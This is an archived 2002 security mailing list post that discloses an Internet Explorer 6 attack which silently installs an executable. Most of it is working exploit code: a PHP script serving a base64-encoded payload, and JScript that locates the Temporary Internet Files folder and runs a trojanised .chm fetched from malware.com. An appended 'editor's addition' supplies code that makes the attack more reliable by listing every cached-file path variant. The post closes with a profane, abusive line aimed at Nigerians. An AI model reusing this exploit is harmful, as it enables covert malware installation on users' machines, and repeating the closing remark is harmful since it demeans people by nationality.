Open Source and information security mailing list archives
 
Message-ID: <200208130241.g7D2f8Fn063436@mail41.megamailservers.com>
From: http-equiv at malware.com (http-equiv@...ite.com)
Subject: SAME LADY, DIFFERENT DRESS: Internet Explorer 6

Monday, August 12, 2002

Yet another silent delivery and installation of an executable on the 
target computer using Internet Explorer 6. This can be achieved by 
reversing the following:

http://online.securityfocus.com/bid/5350

And:

HTM. In order to achieve the required results as outlined in the 
above, we must determine the location of the Temporary Internet Files 
[TIF] folders. This can only be achieved if we can physically open 
up our file from within and read its location. Technically that can 
only be achieved if we have a security dialogue prompt asking us for 
permission. If we elect to open the file through acceptance of the 
security warning dialogue, it is opened from within the TIF by 
whatever program is associated with that file.

Okay:

Okay. HTM. HTM files are associated with Internet Explorer. We force 
our *.htm file open via a combination of server `misconfiguration` 
and our PHP 'package' as below:

<?php
// Serve the page as text/html but force the download/open prompt with
// Content-Disposition: attachment. If the user accepts, Internet
// Explorer opens the file out of the Temporary Internet Files folder.
function malware() 
{
header("Content-type: text/html");
header("Content-Disposition: attachment");
// base64 of the HTML/JScript payload shown in clear further below
echo base64_decode(
'PGltZyBkeW5zcmM9Imh0dHA6Ly93d3cubWFsd2FyZS5jb20vbW'.
'Fsd2FyZS9tYWx3YXJlLmNobSIgd2lkdGg9MSBoZWlnaHQ9MT4N'.
'Cg0KPFNDUklQVD4NCg0KLy8gNy4wMi4wMiBodHRwOi8vd3d3Lm'.
'1hbHdhcmUuY29tDQoNCi8vIHlvdSBtYXkgY29uc2lkZXIgd3Jp'.
'dGluZyBzZXZlcmFsIGxpbmVzDQovLyBpbiBjYXNlIG1hbHdhcm'.
'UuY2htIGFycml2ZXMgYXMgWzFdIG9yIFsyXSBldGMNCg0KZnVu'.
'Y3Rpb24gbWFsd2FyZSgpDQp7DQpzPWRvY3VtZW50LlVSTDsNCn'.
'BhdGg9cy5zdWJzdHIoLTAscy5sYXN0SW5kZXhPZigiXFwiKSk7'.
'DQpwYXRoPXVuZXNjYXBlKHBhdGgpOw0KZG9jdW1lbnQud3JpdG'.
'UoJzxGT1JNIG5hbWU9Im1hbHdhcmUiIEFDVElPTj0iamF2YXNj'.
'cmlwdDp3aW5kb3cuc2hvd0hlbHAoZG9jdW1lbnQuZm9ybXNbMF'.
'0uZWxlbWVudHNbMF0udmFsdWUpIj4nKTsNCmRvY3VtZW50Lndy'.
'aXRlKCc8Zm9ybT48aW5wdXQgdHlwZT0iaGlkZGVuIiAgc2l6ZT'.
'0iNDAiIG1heGxlbmd0aD0iODAiIHZhbHVlPSInK3BhdGgrJ1xc'.
'bWFsd2FyZVsxXS5jaG0iPjwvZm9ybT4nKTsNCnNldFRpbWVvdX'.
'QoJ2RvY3VtZW50Lm1hbHdhcmUuc3VibWl0KCknLDEwMDAwKTsN'.
'CiB9IA0Kc2V0VGltZW91dCgibWFsd2FyZSgpIiwyNTAwKTsgIA'.
'0KPC9TQ1JJUFQ+DQogDQoNCg==');
}
malware();
?>

  <iframe src="<?php echo $PHP_SELF ?>" width=1 height=1> 

Where our PHP 'package' contains our now run-of-the-mill scripting to 
determine our TIF location and our old friend the trojanised *.chm 
file as follows:

<img dynsrc="http://www.malware.com/malware/malware.chm" width=1 height=1>

<SCRIPT>

// 7.02.02 http://www.malware.com

// you may consider writing several lines
// in case malware.chm arrives as [1] or [2] etc

// document.URL is the file path of this .htm inside the Temporary
// Internet Files folder once the user has accepted the open prompt.
function malware()
{
s=document.URL;
// everything up to the last backslash: the TIF folder this file sits in
// (the backslashes below were dropped by the list archive; restored
// from the base64 payload above)
path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
// form whose action hands the cached *.chm (stored by IE next to this
// file as malware[1].chm) to window.showHelp()
document.write('<FORM name="malware" ACTION="javascript:window.showHelp(document.forms[0].elements[0].value)">');
document.write('<form><input type="hidden"  size="40" maxlength="80" value="'+path+'\\malware[1].chm"></form>');
setTimeout('document.malware.submit()',10000);
 } 
setTimeout("malware()",2500);  
</SCRIPT>

note: file path for *.chm must be long as we are now operating off 
the server and from within the TIF

What this does is generate the default security warning for *.htm 
files:

[screen shot: http://www.malware.com/malwarez.png 7KB]

Should we elect to open it, we are once again able to determine our 
TIF location where our *.chm is now residing too and fire our 
scripting to locate and call it.

[screen shot: http://www.malware.com/zerawlam.png 7KB]

Notes:

1. As indicated this is the reverse of: 
http://online.securityfocus.com/bid/5350 . In this instance the 
default is the security warning which should be disengaged to allow 
this to fail.
2. Tested series of win98 machines, Internet Explorer 6.0.2600 and all 
of its bandages.
3. We anxiously await the release of Internet Explorer 6 SP1. 

Special Note: would the gang of Nigerians who have taken up squatting 
on these security mailing lists and who feel it is necessary to 
continuously request our assistance with their multiple millions of 
dollars every day, kindly fuck off and die. Thank you.

End Call


-- 
http://www.malware.com
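
Added example (editor's addition, not part of the post above and not code
from malware.com): the path arithmetic the posted script performs on
document.URL, written out as plain functions so it can be run under Node
rather than IE6. It generalises two points the post only mentions in
passing: the separator in document.URL (the post cuts on a backslash;
the forward-slash form is handled as well, as an assumption), and the
"[1]", "[2]" suffixes the IE cache appends when a file of the same name is
already present, which the payload's own comment says may need several
candidate lines. The sample URL, the Content.IE5 subfolder name and the
function names are constructed for illustration.

```javascript
// Directory part of the URL this .htm was opened from, i.e. the
// Temporary Internet Files subfolder it was cached into. Cuts on the
// last separator first, then unescape()s, in the same order as the post.
function cacheDirFromUrl(url) {
  var cut = Math.max(url.lastIndexOf("\\"), url.lastIndexOf("/"));
  return cut < 0 ? "" : unescape(url.substr(0, cut));
}

// Separator actually used in the URL, so generated paths match it.
// Assumption: IE6 reports file URLs with backslashes (as the post's
// lastIndexOf("\\") implies); a forward-slash form is tolerated too.
function separatorOf(url) {
  return url.indexOf("\\") >= 0 ? "\\" : "/";
}

// IE stores a second copy of "name.ext" as "name[1].ext", a third as
// "name[2].ext", and so on, so the script cannot know which suffix the
// cached .chm received. Produce the plain name and every [n] variant.
function cachedCandidates(dir, sep, name, maxIndex) {
  var dot = name.lastIndexOf(".");
  var stem = dot < 0 ? name : name.substr(0, dot);
  var ext = dot < 0 ? "" : name.substr(dot);
  var out = [dir + sep + name];
  for (var i = 1; i <= maxIndex; i++) {
    out.push(dir + sep + stem + "[" + i + "]" + ext);
  }
  return out;
}

// Everything the posted script derives from document.URL in one call:
// the list of paths it could hand to window.showHelp(), first one that
// exists wins (checking existence is left to the browser, as in the post).
function showHelpTargets(documentUrl, chmName, maxIndex) {
  var dir = cacheDirFromUrl(documentUrl);
  return cachedCandidates(dir, separatorOf(documentUrl), chmName, maxIndex);
}

// Constructed sample (not a real capture): the shape of document.URL
// the post relies on, a .htm opened out of the TIF folder on Win98.
var SAMPLE_URL =
  "file://C:\\WINDOWS\\Temporary%20Internet%20Files\\Content.IE5\\ABCD1234\\malware[1].htm";

if (typeof document === "undefined") {   // running under Node, not IE
  console.log(showHelpTargets(SAMPLE_URL, "malware.chm", 2).join("\n"));
}
```

Running it prints the three candidate paths for the sample URL; in the
real attack only the one matching the suffix IE assigned would resolve.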






